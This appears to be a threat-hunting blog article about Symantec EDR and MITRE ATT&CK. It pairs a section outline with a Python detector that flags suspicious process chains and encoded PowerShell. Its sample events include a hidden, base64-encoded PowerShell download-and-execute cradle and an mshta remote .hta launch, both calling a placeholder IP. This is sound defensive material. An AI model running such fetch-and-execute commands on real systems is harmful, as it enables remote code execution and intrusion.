Threat Hunting with Symantec EDR and ATT&CK


Symantec Endpoint Detection and Response

Symantec Online Network for Advanced Response (SONAR)

Advanced Attack Techniques

Advanced Machine Learning

Symantec EDR Events

Symantec EDR Event Fields

Parent and Child Processes — Command Line

Parent and Child Processes — Executable Names

MITRE ATT&CK Integration

SONAR and Heuristics

Data Enrichment

Let The Hunt Begin
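The outline above names two hunting angles over process-creation telemetry (parent/child executable names and parent/child command lines), enrichment of the matching events, and mapping of hits to MITRE ATT&CK. The following is an added example, not code from the original article or from Symantec: it runs those angles over a handful of constructed events in a deliberately simplified schema. The field names (`parent_name`, `child_name`, `command_line`), the sample events, the rule set and the technique mapping are all assumptions made for illustration and are not Symantec EDR's real event fields or detection logic.

```python
import base64
import re

# Constructed sample payload and events. The schema below is a made-up,
# simplified one for illustration; it is NOT Symantec EDR's event format.
PAYLOAD = "IEX (New-Object Net.WebClient).DownloadString('http://198.51.100.7/p')"
ENCODED_PAYLOAD = base64.b64encode(PAYLOAD.encode("utf-16le")).decode("ascii")

SAMPLE_EVENTS = [
    {"id": 1, "host": "WS01", "parent_name": "explorer.exe", "child_name": "winword.exe",
     "command_line": r'"C:\Program Files\Microsoft Office\WINWORD.EXE" /n invoice.docm'},
    {"id": 2, "host": "WS01", "parent_name": "winword.exe", "child_name": "powershell.exe",
     "command_line": "powershell.exe -NoP -W Hidden -EncodedCommand " + ENCODED_PAYLOAD},
    {"id": 3, "host": "WS02", "parent_name": "svchost.exe", "child_name": "mshta.exe",
     "command_line": "mshta.exe http://198.51.100.7/a.hta"},
    {"id": 4, "host": "WS03", "parent_name": "explorer.exe", "child_name": "cmd.exe",
     "command_line": "cmd.exe /c dir"},  # benign: must not produce a finding
]

# ATT&CK technique IDs the rules below map to (names as published by MITRE).
TECHNIQUE_NAMES = {
    "T1027": "Obfuscated Files or Information",
    "T1059.001": "Command and Scripting Interpreter: PowerShell",
    "T1059.003": "Command and Scripting Interpreter: Windows Command Shell",
    "T1204.002": "User Execution: Malicious File",
    "T1218.005": "System Binary Proxy Execution: Mshta",
    "T1218.010": "System Binary Proxy Execution: Regsvr32",
    "T1218.011": "System Binary Proxy Execution: Rundll32",
}

OFFICE_APPS = {"winword.exe", "excel.exe", "powerpnt.exe", "outlook.exe"}
INTERPRETERS = {"powershell.exe": "T1059.001", "cmd.exe": "T1059.003"}
LOLBINS = {"mshta.exe": "T1218.005", "regsvr32.exe": "T1218.010", "rundll32.exe": "T1218.011"}
SCRIPT_HOSTS = {"wscript.exe", "cscript.exe"}

# -EncodedCommand and its common abbreviations, followed by a base64 blob.
ENCODED_RE = re.compile(r"(?<!\S)-(?:e|ec|enc|encodedcommand)\s+([A-Za-z0-9+/=]{8,})", re.I)
URL_RE = re.compile(r"https?://[^\s'\"<>]+", re.I)


def decode_encoded_command(blob):
    """PowerShell -EncodedCommand takes base64 of the UTF-16LE script text."""
    padded = blob + "=" * (-len(blob) % 4)
    return base64.b64decode(padded).decode("utf-16le", errors="replace")


def hunt(events):
    """Return one finding per event that trips an executable-name or command-line rule."""
    findings = []
    for ev in events:
        parent, child = ev["parent_name"].lower(), ev["child_name"].lower()
        cmd = ev["command_line"]
        techniques, reasons, enrichment = set(), [], {}

        # Angle 1: executable names, i.e. who spawned whom.
        if parent in OFFICE_APPS and child in (INTERPRETERS.keys() | LOLBINS.keys() | SCRIPT_HOSTS):
            techniques.add("T1204.002")
            reasons.append(f"Office process {parent} spawned {child}")
        if child in LOLBINS:
            techniques.add(LOLBINS[child])
            reasons.append(f"signed proxy-execution binary {child} launched")

        # Angle 2: command line, here an encoded PowerShell command.
        m = ENCODED_RE.search(cmd)
        if m:
            techniques.update({"T1059.001", "T1027"})
            reasons.append("encoded PowerShell command")
            enrichment["decoded_command"] = decode_encoded_command(m.group(1))

        # A bare interpreter launch is noise; attribute it only when another rule fired.
        if techniques and child in INTERPRETERS:
            techniques.add(INTERPRETERS[child])

        if not techniques:
            continue

        # Enrichment: pull URLs out of the raw and the decoded command line.
        urls = set(URL_RE.findall(cmd)) | set(URL_RE.findall(enrichment.get("decoded_command", "")))
        if urls:
            enrichment["urls"] = sorted(urls)

        findings.append({
            "event_id": ev["id"],
            "host": ev["host"],
            "process_chain": f"{parent} -> {child}",
            "techniques": sorted(techniques),
            "technique_names": [TECHNIQUE_NAMES[t] for t in sorted(techniques)],
            "reasons": reasons,
            "enrichment": enrichment,
        })
    return findings


if __name__ == "__main__":
    for finding in hunt(SAMPLE_EVENTS):
        print(finding)
```

Two design points carry over to a real hunt regardless of the product: a child interpreter is only attributed to a technique when some other indicator (the parent, a LOLBin, an encoded command) has already fired, which keeps `explorer.exe -> cmd.exe` out of the results, and enrichment is done on the decoded form of the command as well as the raw one, since the URL in event 2 is invisible until the base64 UTF-16LE blob is decoded.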

Written by

#ThreatHunting #WindowsInternals #Malware #DFIR and occasionally #Python.
